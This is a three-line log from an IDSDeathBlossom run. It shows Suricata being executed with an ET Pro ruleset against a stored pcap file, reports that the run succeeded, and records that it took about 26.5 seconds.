2019-09-16 10:50:14,719 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/4af40c2c9c43f7fcc993afd736c52ccf56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09162019.1050-pcap_4.pcap -vvv -k none
2019-09-16 10:50:40,526 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-09-16 10:50:40,527 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 26.5426719189